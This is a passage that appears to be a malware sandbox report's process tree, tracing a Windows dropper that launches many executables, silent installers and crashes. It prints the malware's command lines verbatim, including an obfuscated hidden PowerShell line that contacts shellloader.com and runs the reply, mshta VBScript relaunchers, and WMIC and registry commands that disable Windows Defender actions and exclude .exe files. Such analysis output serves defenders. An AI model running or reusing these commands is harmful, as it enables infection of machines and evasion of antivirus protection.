        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3888
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3888 -s 1528
        8⤵
        Program crash
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 804
        8⤵
        Program crash
        
        PID:3432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 828
        8⤵
        Program crash
        
        PID:1612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 892
        8⤵
        Program crash
        
        PID:4804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 832
        8⤵
        Program crash
        
        PID:4060
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 964
        8⤵
        Program crash
        
        PID:3168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 1092
        8⤵
        Program crash
        
        PID:5920
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 796
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"
        7⤵
        Executes dropped EXE
        
        PID:2692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 260
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 480
        8⤵
        Program crash
        
        PID:5128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 492
        8⤵
        Program crash
        
        PID:5248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 456
        8⤵
        Program crash
        
        PID:5684
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 500
        8⤵
        Program crash
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4900
        
        C:\ProgramData\8751723.exe
        
        "C:\ProgramData\8751723.exe"
        8⤵
        Executes dropped EXE
        
        PID:6096
        
        C:\ProgramData\3449216.exe
        
        "C:\ProgramData\3449216.exe"
        8⤵
        Executes dropped EXE
        
        PID:5680
        
        C:\ProgramData\3449216.exe
        
        "C:\ProgramData\3449216.exe"
        9⤵
        
        PID:4348
        
        C:\ProgramData\3449216.exe
        
        "C:\ProgramData\3449216.exe"
        9⤵
        
        PID:4128
        
        C:\ProgramData\6215416.exe
        
        "C:\ProgramData\6215416.exe"
        8⤵
        Executes dropped EXE
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"
        7⤵
        Executes dropped EXE
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe"
        8⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe
        9⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        
        PID:5096
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5096 -s 1532
        8⤵
        Program crash
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\is-F3NNQ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F3NNQ.tmp\setup_2.tmp" /SL5="$10300,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\is-HMARC.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HMARC.tmp\setup_2.tmp" /SL5="$2034E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\is-LHDCJ.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LHDCJ.tmp\postback.exe" ss1
        11⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        
        PID:9468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"
        13⤵
        
        PID:9400
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"
        14⤵
        
        PID:3996
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"
        15⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dllX2WiCclhV.dll"
        13⤵
        
        PID:10220
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dllX2WiCclhV.dll"
        14⤵
        
        PID:10792
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        
        PID:5172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe
      4⤵
      PID:5096
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe
        
        Thu1170fdf4c09b1.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3132
      - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe
        6⤵
        Executes dropped EXE
        
        PID:3940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe
      4⤵
      PID:3428
    - - C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exe
        
        Thu118c8b4c3885d897d.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe
      4⤵
      PID:5112

C:\Users\Admin\AppData\Local\Temp\is-BSEJC.tmp\Thu11b9fee5fd5b3c.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BSEJC.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$3002E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11b9fee5fd5b3c.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:676
- C:\Users\Admin\AppData\Local\Temp\is-E89K8.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-E89K8.tmp\Setup.exe" /Verysilent
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3432
- - C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe
    "C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"
    3⤵
    PID:6264
  - - C:\Users\Admin\AppData\Local\Temp\sampason12345.exe
      "C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"
      4⤵
      PID:9168

C:\Users\Admin\AppData\Local\Temp\is-F7MC6.tmp\Thu112e5981b78.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F7MC6.tmp\Thu112e5981b78.tmp" /SL5="$30030,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu112e5981b78.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:392
- C:\Users\Admin\AppData\Local\Temp\is-2J2HD.tmp\___YHDG34.exe
  "C:\Users\Admin\AppData\Local\Temp\is-2J2HD.tmp\___YHDG34.exe" /S /UID=burnerch2
  2⤵
  - Executes dropped EXE
  PID:4584
- - C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe
    "C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe" /VERYSILENT
    3⤵
    PID:6800
  - - C:\Users\Admin\AppData\Local\Temp\is-34EGS.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-34EGS.tmp\ultramediaburner.tmp" /SL5="$502A8,281924,62464,C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe" /VERYSILENT
      4⤵
      PID:7028
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        
        PID:6152
- - C:\Users\Admin\AppData\Local\Temp\23-c4fc0-a51-b4d9b-d03d9d689fe39\Peshalyfiqu.exe
    "C:\Users\Admin\AppData\Local\Temp\23-c4fc0-a51-b4d9b-d03d9d689fe39\Peshalyfiqu.exe"
    3⤵
    PID:4500
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 2256
      4⤵
      PID:10696
- - C:\Users\Admin\AppData\Local\Temp\bd-13c28-143-4c3ac-1e78eb0a3d2f5\Pyrexoceshae.exe
    "C:\Users\Admin\AppData\Local\Temp\bd-13c28-143-4c3ac-1e78eb0a3d2f5\Pyrexoceshae.exe"
    3⤵
    PID:5656
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exe /eufive & exit
      4⤵
      PID:8524
    - - C:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exe /eufive
        5⤵
        
        PID:8976
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:5592
    - - C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe /qn CAMPAIGN="654"
        5⤵
        
        PID:4728
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631831592 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        6⤵
        
        PID:10352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exe & exit
      4⤵
      PID:9044
    - - C:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exe
        5⤵
        
        PID:7216
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exe & exit
      4⤵
      PID:6544
    - - C:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exe
        
        C:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exe
        5⤵
        
        PID:5796
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exe /mixfive & exit
      4⤵
      PID:9136
    - - C:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exe /mixfive
        5⤵
        
        PID:7660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xu1uopye.gxg\autosubplayer.exe /S & exit
      4⤵
      PID:5824

C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exe
1⤵
- Executes dropped EXE
PID:2880

C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe
1⤵
- Executes dropped EXE
PID:2824

C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1171b1ca5023f5d2.exe
Thu1171b1ca5023f5d2.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4264
- C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4580
- - C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe
    C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe
    3⤵
    - Executes dropped EXE
    PID:4868

C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11f1187a97f50d9c.exe
Thu11f1187a97f50d9c.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4172
- C:\Users\Admin\Documents\pvrscUurP3aZOoAuPXgzSfJe.exe
  "C:\Users\Admin\Documents\pvrscUurP3aZOoAuPXgzSfJe.exe"
  2⤵
  - Executes dropped EXE
  PID:4036
- C:\Users\Admin\Documents\J_XEb9uAetGZ8l0vu77r36bZ.exe
  "C:\Users\Admin\Documents\J_XEb9uAetGZ8l0vu77r36bZ.exe"
  2⤵
  - Executes dropped EXE
  PID:5776
- - C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
    "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
    3⤵
    PID:7280
  - - C:\Users\Admin\Documents\y9iaqrPgJL8KQHzrABokll5_.exe
      "C:\Users\Admin\Documents\y9iaqrPgJL8KQHzrABokll5_.exe"
      4⤵
      PID:9308
  - - C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe
      "C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"
      4⤵
      PID:10292
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )
        5⤵
        
        PID:9236
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe" ) do taskkill -iM "%~nxq" /f
        6⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe
        
        roBCqJOQYC.eXe -P0_6X2fnCLFU6G
        7⤵
        
        PID:9652
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )
        8⤵
        
        PID:8984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f
        9⤵
        
        PID:7296
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs
        8⤵
        
        PID:9252
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "5BudUgFVj7SjIU6cVKqGBoSH.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:4172
  - - C:\Users\Admin\Documents\avQ5spkoN5PQwlUAL4AOWn7V.exe
      "C:\Users\Admin\Documents\avQ5spkoN5PQwlUAL4AOWn7V.exe" /mixtwo
      4⤵
      PID:10276
  - - C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe
      "C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"
      4⤵
      PID:10328
    - - C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe
        
        "C:\Users\Admin\Documents\ycqebZfR_uypvpOOf_9nytPW.exe"
        5⤵
        
        PID:3472
  - - C:\Users\Admin\Documents\eMIN_Aj72Vn10NEFTIIK1vHs.exe
      "C:\Users\Admin\Documents\eMIN_Aj72Vn10NEFTIIK1vHs.exe"
      4⤵
      PID:10352
  - - C:\Users\Admin\Documents\a7gsYWKZFTyxH1VS4OAF8KcE.exe
      "C:\Users\Admin\Documents\a7gsYWKZFTyxH1VS4OAF8KcE.exe"
      4⤵
      PID:10404
    - - C:\Users\Admin\AppData\Local\Temp\7zS32C4.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:10468
      - C:\Users\Admin\AppData\Local\Temp\7zS33CE.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        6⤵
        
        PID:10664
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        7⤵
        
        PID:9032
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:10948
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:10716
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:4012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:1336
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:11220
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:9072
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:10444
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        8⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        9⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:9724
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:10444
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:10968
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:10912
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:10448
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:9876
        
        C:\Windows\SysWOW64\forfiles.exe
        
